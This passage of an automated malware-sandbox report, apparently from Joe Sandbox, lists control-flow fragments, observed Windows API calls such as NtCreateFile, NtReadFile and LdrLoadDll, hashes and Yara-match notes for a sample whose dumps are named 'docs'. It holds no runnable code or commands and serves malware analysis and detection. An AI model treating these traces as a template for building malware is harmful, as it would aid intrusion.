• Opcode ID: 1af3cf111e6e80c9c59307679be72ed88ba5277c9bb8d1c8082480c991613a23
• Instruction ID: 5e800b5e01711ccc39970a24c71edff0a2edcb0f40e3081b6877ce97bec67b08
• Opcode Fuzzy Hash: 1af3cf111e6e80c9c59307679be72ed88ba5277c9bb8d1c8082480c991613a23
• Instruction Fuzzy Hash: AC814870A00B458FDB25DF29D09479ABBF1FF88304F04892DD68AD7A54EB74E809CB91

Control-flow Graph

                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateActCtxA.KERNEL32(?), ref: 013B5CC1
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2158527518.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_13b0000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Create
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2289755597-0
                                                                                                                                                                                                                      • Opcode ID: e9d8bcfba162205ce16198aa92b2e3c505d1b89648ea9fbf6ff668c2579a2ceb
                                                                                                                                                                                                                      • Instruction ID: 9467985bf66f6c658a6fdba0bc29e16e2b56cdd94049ee88a0ff50c0296bebb1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e9d8bcfba162205ce16198aa92b2e3c505d1b89648ea9fbf6ff668c2579a2ceb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2441F1B0C0071DCBEB25DFA9C984BDEBBB5BF48704F20816AD508AB251DB756945CF90

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      control_flow_graph 174 13b5c05-13b5cd1 CreateActCtxA 176 13b5cda-13b5d34 174->176 177 13b5cd3-13b5cd9 174->177 184 13b5d43-13b5d47 176->184 185 13b5d36-13b5d39 176->185 177->176 186 13b5d49-13b5d55 184->186 187 13b5d58 184->187 185->184 186->187 189 13b5d59 187->189 189->189
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • CreateActCtxA.KERNEL32(?), ref: 013B5CC1
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2158527518.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_13b0000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Create
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2289755597-0
                                                                                                                                                                                                                      • Opcode ID: 0da8b1e0c8f1e1046a7d05a30bf034f2bc01bf7c8d3c4d0ee83ca68c9397058b
                                                                                                                                                                                                                      • Instruction ID: bbf2a4d4f51e74ff6cb7ba56b9487424003520c3b3819336aea4101292ae7d30
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0da8b1e0c8f1e1046a7d05a30bf034f2bc01bf7c8d3c4d0ee83ca68c9397058b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1D41D2B0C0061DCBEB25DFA9C984BDEBBB1BF49704F20815AD508AB251DB756946CF90

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      control_flow_graph 190 13bd7b8-13bd854 DuplicateHandle 191 13bd85d-13bd87a 190->191 192 13bd856-13bd85c 190->192 192->191
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 013BD847
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2158527518.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_13b0000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: DuplicateHandle
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3793708945-0
                                                                                                                                                                                                                      • Opcode ID: 9dfc033ea233256e44dcedb21a77a160aad80937049eeb47d2c2f8f3deafeb58
                                                                                                                                                                                                                      • Instruction ID: 15a7eb61696760b437584eda67a5146bb1a98977bc7ca3e82ae457058e930277
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9dfc033ea233256e44dcedb21a77a160aad80937049eeb47d2c2f8f3deafeb58
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4C21E3B5900249DFDB10CFAAD984AEEBFF5EB48324F14801AE959A3210D379A954CF61

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      control_flow_graph 195 13bd7c0-13bd854 DuplicateHandle 196 13bd85d-13bd87a 195->196 197 13bd856-13bd85c 195->197 197->196
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 013BD847
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2158527518.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_13b0000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: DuplicateHandle
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3793708945-0
                                                                                                                                                                                                                      • Opcode ID: 03fdde0833f4cfa2076347eda8c0cffba00d5cae2e2dcf2f1c97809289f924d2
                                                                                                                                                                                                                      • Instruction ID: cbfcf498464f380bf87ca167678f605d3fc32d8490b57c9657570700a59a9840
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 03fdde0833f4cfa2076347eda8c0cffba00d5cae2e2dcf2f1c97809289f924d2
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8921E4B5900209DFDB10CF9AD984ADEBFF4FB48324F14801AE918A3310D378A954CFA1

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      control_flow_graph 200 13bb4e0-13bb520 201 13bb528-13bb553 GetModuleHandleW 200->201 202 13bb522-13bb525 200->202 203 13bb55c-13bb570 201->203 204 13bb555-13bb55b 201->204 202->201 204->203
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 013BB546
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2158527518.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_13b0000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: HandleModule
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4139908857-0
                                                                                                                                                                                                                      • Opcode ID: 71772d2d01217a746585be488e017167b3ee3b98723e946d341ea691fdfb4ff5
                                                                                                                                                                                                                      • Instruction ID: 35a54faf34559c49e00c8282c18849555fe8ce7e255b63209e8ba32cf0535a19
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 71772d2d01217a746585be488e017167b3ee3b98723e946d341ea691fdfb4ff5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 67110FB6C00649CFDB10CF9AD444BDEFBF4AF88324F10841AD519A7600D7B9A545CFA2
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2158063200.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_135d000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 962742e2a338c84b08586dd2f099f300868cace594fa8654c227e51b9520e3d0
                                                                                                                                                                                                                      • Instruction ID: a61afd68894144a6679ed3747491bf4549a29828064c164e2ec256c014607ea8
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 962742e2a338c84b08586dd2f099f300868cace594fa8654c227e51b9520e3d0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D12148B2104204DFDB05DF44D9C0F66BF65FB84728F20C16CDD0A1B256C736E456CAA1
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2158063200.000000000135D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0135D000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_135d000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 17334c67ef930f4f3e70bf0df8ace5ec0bf011564c7c6f538a5e38d893efb17f
                                                                                                                                                                                                                      • Instruction ID: 1e9989ba80a1ae1f4edca937b515f6df7074d597d8477d8970db07fce558649d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 17334c67ef930f4f3e70bf0df8ace5ec0bf011564c7c6f538a5e38d893efb17f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1D2103B2504244EFDB45DF54D9C0F26BF65FB88B1CF20C969ED090B256C336D456CAA1
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5480000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: V3~
                                                                                                                                                                                                                      • API String ID: 0-1917302123
                                                                                                                                                                                                                      • Opcode ID: 3e8001b2777e4dbceeef59a834108162ff0a616179370793954d510a27683f26
                                                                                                                                                                                                                      • Instruction ID: 04027c97de409699f6c931556b3f46252fcaeda59b5c4e63c148ccf9225b1ba8
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3e8001b2777e4dbceeef59a834108162ff0a616179370793954d510a27683f26
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 96513974E042198FDB08DFA9C9456EEFBF2FB88300F24D56AD415B7254D7748A428BA4
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2162862084.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5480000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: 4$VD
                                                                                                                                                                                                                      • API String ID: 0-4229505421
                                                                                                                                                                                                                      • Opcode ID: 28365710f205e66da319c93d937e135d65b55c86579b2e79bf5fb8f446725d4e
                                                                                                                                                                                                                      • Instruction ID: 70f81b63e21e2e661dae538fbabd046fbf10edd2e9b70cec5317ec3c1b7417c2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 28365710f205e66da319c93d937e135d65b55c86579b2e79bf5fb8f446725d4e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B841E6B0D0060A9BCB08DFAAC5816EEFBF2BF88300F14D52AD515E7254E7349A46CF95
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2162862084.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5480000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: 4$VD
                                                                                                                                                                                                                      • API String ID: 0-4229505421
                                                                                                                                                                                                                      • Opcode ID: 011fcb9346ba5a851864286eb15f4b6b84991b721db80363d6ea265a0c1b67dc
                                                                                                                                                                                                                      • Instruction ID: 7f322a5cc6301eef85c2a581dd9707ad75e35b4cfb94dcd7eca8ea2a79ec67c0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 011fcb9346ba5a851864286eb15f4b6b84991b721db80363d6ea265a0c1b67dc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9B41F7B0D0060A9BCB08DFAAC5815EEFBF2BF98300F14D52AC519E7254E7349A46CF95
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2162862084.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5480000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 95df5ef89c3d7d56b6d493acb358bad1decded1aaf27bc24b15fdfb4fdaa7c5f
                                                                                                                                                                                                                      • Instruction ID: 03190a1d0aabf8796122286ebb5befc80341050f5803e6ad7ec2c92fe9e211fd
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 95df5ef89c3d7d56b6d493acb358bad1decded1aaf27bc24b15fdfb4fdaa7c5f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3DD1E73192075ACACB05EB64D990AD9F7B1FF95300F20979AD50A77210FF706AC5CB81
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2158527518.00000000013B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013B0000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_13b0000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 33c18b6b5d48182b39b2c8b86ced129b7e6053dc8f85309c95c828f70a157725
                                                                                                                                                                                                                      • Instruction ID: 8549cb83bade96d33a63b140c81e6eb37b643fadeefd743e2fe739c2539d654a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 33c18b6b5d48182b39b2c8b86ced129b7e6053dc8f85309c95c828f70a157725
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3AA17132E0021A8FCF15DFB8C8805DEBBB6FF85304B254579EA01AB665EB31D955CB80
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2162862084.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5480000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: b8ddc26efc623cb9c10599f17d405a46055eb930330d2bbc546ec54020052817
                                                                                                                                                                                                                      • Instruction ID: a52e3e104a0a9fd772533e1ebcac333b3204a178d992d05f9671ce3cf3db9489
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b8ddc26efc623cb9c10599f17d405a46055eb930330d2bbc546ec54020052817
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F8D1E63192075ACACB15EB64D990ADAF7B1FF95300F20979AE50A77210FF706AC5CB80
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2162862084.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5480000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 7773651359dc3358f3204d04835505b17c71b1c4c463c14b7f1b48e4adc0a0f6
                                                                                                                                                                                                                      • Instruction ID: cf1e31255c6add03bd8dc45320c371d08461845e2058366d8075084604a78a07
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7773651359dc3358f3204d04835505b17c71b1c4c463c14b7f1b48e4adc0a0f6
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6C81D074A15209CFCB44CF99C6849EEFBF2FF88210F14855AE419AB320D734AA52CF90
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2162862084.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5480000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 017f9f9893329854e9ed82f873407c465ba247aaac9ddd7682e08add04e21644
                                                                                                                                                                                                                      • Instruction ID: 38087c49283b653ece00ab1cb074da597d97bf11dd375f795a7416ac48515a09
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 017f9f9893329854e9ed82f873407c465ba247aaac9ddd7682e08add04e21644
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BD71C374E15209DFCB44CFA9C5849AEFBF6FF88210F148556E419AB320D734AA52CF51
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000000.00000002.2162862084.0000000005480000.00000040.00000800.00020000.00000000.sdmp, Offset: 05480000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_5480000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 6f94971f00bfef50190ad058d028d36a955f09ae886b80b8b3c21f72505cb00a

Execution Graph

Execution Coverage: 1.3%
Dynamic/Decrypted Code Coverage: 2.7%
Signature Coverage: 6.2%
Total number of Nodes: 549
Total number of Limit Nodes: 66
LdrInitializeThunk 99769->99930 99770->99769 99771 40c385 99771->99293 99771->99296 99774 41af30 LdrLoadDll 99773->99774 99775 41a04c 99774->99775 99931 f82d30 LdrInitializeThunk 99775->99931 99776 40c459 99776->99304 99779 41af30 LdrLoadDll 99778->99779 99780 419e0c 99779->99780 99932 f82fb0 LdrInitializeThunk 99780->99932 99781 40c4ac 99781->99308 99783->99745 99784->99743 99786 407ea0 4 API calls 99785->99786 99800 4087ba 99785->99800 99786->99800 99787 408a49 99787->99750 99788 408a3f 99789 408160 2 API calls 99788->99789 99789->99787 99792 419ed0 2 API calls 99792->99800 99796 40c4c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 99796->99800 99799 419df0 2 API calls 99799->99800 99800->99787 99800->99788 99800->99792 99800->99796 99800->99799 99801 41a460 LdrLoadDll NtClose 99800->99801 99804 419ce0 99800->99804 99807 4085d0 99800->99807 99819 40f5f0 LdrLoadDll NtClose 99800->99819 99820 419d60 LdrLoadDll 99800->99820 99821 419d90 LdrLoadDll 99800->99821 99822 419e20 LdrLoadDll 99800->99822 99823 4083a0 99800->99823 99839 405f60 LdrLoadDll 99800->99839 99801->99800 99803->99755 99805 41af30 LdrLoadDll 99804->99805 99806 419cfc 99805->99806 99806->99800 99808 4085e6 99807->99808 99840 419850 99808->99840 99810 4085ff 99815 408771 99810->99815 99861 4081a0 99810->99861 99812 4086e5 99813 4083a0 11 API calls 99812->99813 99812->99815 99814 408713 99813->99814 99814->99815 99816 419ed0 2 API calls 99814->99816 99815->99800 99817 408748 99816->99817 99817->99815 99818 41a4d0 2 API calls 99817->99818 99818->99815 99819->99800 99820->99800 99821->99800 99822->99800 99824 4083c9 99823->99824 99901 408310 99824->99901 99827 41a4d0 2 API calls 99828 4083dc 99827->99828 99828->99827 99829 408467 99828->99829 99831 408462 99828->99831 99909 40f670 99828->99909 99829->99800 99830 41a460 2 API calls 99832 40849a 99830->99832 99831->99830 99832->99829 99833 419ce0 LdrLoadDll 99832->99833 99834 4084ff 99833->99834 99834->99829 99913 419d20 
99834->99913 99836 408563 99836->99829 99837 414a50 8 API calls 99836->99837 99838 4085b8 99837->99838 99838->99800 99839->99800 99841 41bf60 2 API calls 99840->99841 99842 419867 99841->99842 99868 409310 99842->99868 99844 419882 99845 4198c0 99844->99845 99846 4198a9 99844->99846 99849 41bd10 2 API calls 99845->99849 99847 41bd90 2 API calls 99846->99847 99848 4198b6 99847->99848 99848->99810 99850 4198fa 99849->99850 99851 41bd10 2 API calls 99850->99851 99852 419913 99851->99852 99858 419bb4 99852->99858 99874 41bd50 99852->99874 99855 419ba0 99856 41bd90 2 API calls 99855->99856 99857 419baa 99856->99857 99857->99810 99859 41bd90 2 API calls 99858->99859 99860 419c09 99859->99860 99860->99810 99862 40829f 99861->99862 99863 4081b5 99861->99863 99862->99812 99863->99862 99864 414a50 8 API calls 99863->99864 99865 408222 99864->99865 99866 41bd90 2 API calls 99865->99866 99867 408249 99865->99867 99866->99867 99867->99812 99869 409335 99868->99869 99870 40acf0 LdrLoadDll 99869->99870 99871 409368 99870->99871 99873 40938d 99871->99873 99877 40cf20 99871->99877 99873->99844 99895 41a550 99874->99895 99878 40cf4c 99877->99878 99879 41a1b0 LdrLoadDll 99878->99879 99880 40cf65 99879->99880 99881 40cf6c 99880->99881 99888 41a1f0 99880->99888 99881->99873 99885 40cfa7 99886 41a460 2 API calls 99885->99886 99887 40cfca 99886->99887 99887->99873 99889 41a20c 99888->99889 99890 41af30 LdrLoadDll 99888->99890 99894 f82ca0 LdrInitializeThunk 99889->99894 99890->99889 99891 40cf8f 99891->99881 99893 41a7e0 LdrLoadDll 99891->99893 99893->99885 99894->99891 99896 41af30 LdrLoadDll 99895->99896 99897 41a56c 99896->99897 99900 f82f90 LdrInitializeThunk 99897->99900 99898 419b99 99898->99855 99898->99858 99900->99898 99902 408328 99901->99902 99903 40acf0 LdrLoadDll 99902->99903 99904 408343 99903->99904 99905 414e50 LdrLoadDll 99904->99905 99906 408353 99905->99906 99907 40835c PostThreadMessageW 99906->99907 99908 408370 99906->99908 99907->99908 99908->99828 99910 40f683 
99909->99910 99916 419e60 99910->99916 99914 41af30 LdrLoadDll 99913->99914 99915 419d3c 99914->99915 99915->99836 99917 419e7c 99916->99917 99918 41af30 LdrLoadDll 99916->99918 99921 f82dd0 LdrInitializeThunk 99917->99921 99918->99917 99919 40f6ae 99919->99828 99921->99919 99922->99759 99924 419fa6 99923->99924 99925 41af30 LdrLoadDll 99924->99925 99926 419fac 99925->99926 99929 f82f30 LdrInitializeThunk 99926->99929 99927 40f4fe 99927->99765 99927->99766 99929->99927 99930->99771 99931->99776 99932->99781 99935 f82ad0 LdrInitializeThunk

Control-flow Graph

control_flow_graph 0 41a3da-41a429 call 41af30 NtReadFile
APIs
• NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A425
Strings
Memory Dump Source
• Source File: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_docs.jbxd
Yara matches
Similarity
• API ID: FileRead
• String ID: 1JA$rMA$rMA
• API String ID: 2738559852-782607585
• Opcode ID: 757b6e1bc07b3bf09793faee9661551754b0ff6aec0333777d77dda8410c520e
• Instruction ID: d9496cab67eccaa2a300e7c2e8500b7217d72c9056333dd282b08d57620d7ac6
• Opcode Fuzzy Hash: 757b6e1bc07b3bf09793faee9661551754b0ff6aec0333777d77dda8410c520e
• Instruction Fuzzy Hash: 87F01DB2210148ABCB05DF98D890CEB7BADAF8C314B15869DFD0C97216C634E855CBA0

Control-flow Graph

control_flow_graph 3 41a3e0-41a3f6 4 41a3fc-41a429 NtReadFile 3->4 5 41a3f7 call 41af30 3->5 5->4
APIs
• NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A425
Strings
Memory Dump Source
• Source File: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_docs.jbxd
Yara matches
Similarity
• API ID: FileRead
• String ID: 1JA$rMA$rMA
• API String ID: 2738559852-782607585
• Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
• Instruction ID: c75c44bd16ed9a046d03b4490adc68ebadf214b0f3589fd2ba36fb57c0fad8bd
• Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
• Instruction Fuzzy Hash: 95F0B7B2210208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4

Control-flow Graph

control_flow_graph 204 41a2ea-41a2ee 205 41a2f0-41a329 call 41af30 204->205 206 41a338-41a381 call 41af30 NtCreateFile 204->206
APIs
• NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A37D
Memory Dump Source
• Source File: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_docs.jbxd
Yara matches
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 94b546fadc3172d4cbd0974d002435d2c170b5460e604780f875a3b40548b332
• Instruction ID: 7d927b91c53d99ff772232a7bee72b09811667c0becba63b72a30f99829caa9b
• Opcode Fuzzy Hash: 94b546fadc3172d4cbd0974d002435d2c170b5460e604780f875a3b40548b332
• Instruction Fuzzy Hash: DE1107B2215209ABCB08DF98DC85DEB77ADAF8C314F05824DFA4DA7241C630E851CBA4

Control-flow Graph

control_flow_graph 227 40acf0-40ad0c 228 40ad14-40ad19 227->228 229 40ad0f call 41cc20 227->229 230 40ad1b-40ad1e 228->230 231 40ad1f-40ad2d call 41d040 228->231 229->228 234 40ad3d-40ad4e call 41b470 231->234 235 40ad2f-40ad3a call 41d2c0 231->235 240 40ad50-40ad64 LdrLoadDll 234->240 241 40ad67-40ad6a 234->241 235->234 240->241
APIs
• LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
Memory Dump Source
• Source File: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_docs.jbxd
Yara matches
Similarity
• API ID: Load
• String ID:
• API String ID: 2234796835-0
• Opcode ID: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
• Instruction ID: 667dcf47c4413345b20473d406be44d3d8b7ebea9a3b2269cd40777f9644ce6e
• Opcode Fuzzy Hash: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
• Instruction Fuzzy Hash: 79015EB5D0020DBBDB10EBA1DC42FDEB3799F54308F0045AAA908A7281F638EB54CB95

Control-flow Graph

control_flow_graph 251 41a32a-41a346 252 41a34c-41a381 NtCreateFile 251->252 253 41a347 call 41af30 251->253 253->252
APIs
• NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A37D
Memory Dump Source
• Source File: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_docs.jbxd
Yara matches
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: ee3695a4899577ce3d874c1ef7f2278fb65b84fc6352f54c306a385979961bef
• Instruction ID: 24e128ae343006bbbc751a00b5729f9aa9b5416c578219d56ac147f4e2306034
• Opcode Fuzzy Hash: ee3695a4899577ce3d874c1ef7f2278fb65b84fc6352f54c306a385979961bef
• Instruction Fuzzy Hash: 4201B2B2251208AFCB08CF88DC95EEB77ADAF8C754F558248FA1D97245D630E851CBA4

Control-flow Graph (image not recovered; blocks and edges from the graph data): 41a330-41a346 -> 41a34c-41a381 (NtCreateFile); 41a330-41a346 -> 41a347 (call 41af30) -> 41a34c-41a381
APIs
